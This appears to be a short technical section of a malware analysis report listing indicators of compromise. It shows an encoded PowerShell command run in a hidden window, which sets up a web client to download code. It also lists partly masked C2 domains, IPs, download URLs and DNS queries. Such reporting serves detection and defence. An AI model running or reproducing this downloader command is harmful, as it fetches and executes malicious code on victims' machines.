Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAF8AXwBfADQANQAzADgAPQAoACcATAAzADMANwBfACcAKwAnADkAMQAnACkAOwAkAE4ANAA0AF8ANABfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFAAMQA2AF8AOAAwAF8AOQA9ACgAJwBoAH...
- 'ba###365.com':80
- '13.##3.183.227':80
- '12#.#99.187.124':80
- '10#.#23.40.40':80
- http://ba###365.com/v59HxZy
- http://13.##3.183.227/5VfqqsmV
- DNS ASK ba###365.com
- DNS ASK gi####rloraso.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABhAF8AXwBfADQANQAzADgAPQAoACcATAAzADMANwBfACcAKwAnADkAMQAnACkAOwAkAE4ANAA0AF8ANABfAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFAAMQA2AF8AOAAwAF8AOQA9ACgAJwBoAH...' (со скрытым окном)